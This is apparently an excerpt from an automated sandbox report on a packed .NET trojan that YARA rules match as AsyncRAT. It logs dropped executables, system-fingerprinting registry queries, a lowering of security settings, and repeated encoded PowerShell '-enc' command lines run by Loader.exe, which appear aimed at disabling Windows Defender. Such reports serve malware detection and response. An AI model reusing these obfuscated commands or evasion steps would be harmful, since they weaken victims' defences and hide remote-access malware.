uageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma

Source: Loaader.exe, 00000015.00000002.3282228143.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Loaader.exe, 00000015.00000002.3282228143.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Roaming\Loaader.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the product ID of Windows

Source: C:\Users\user\AppData\Roaming\Loaader.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Infected.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinDefend.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Queries volume information: C:\Users\user\AppData\Roaming\Loaader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Queries volume information: C:\Users\user\AppData\Roaming\Loader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Queries volume information: C:\Users\user\AppData\Roaming\Loader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Queries volume information: C:\Users\user\AppData\Roaming\Loaader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinDefend.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinDefend.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
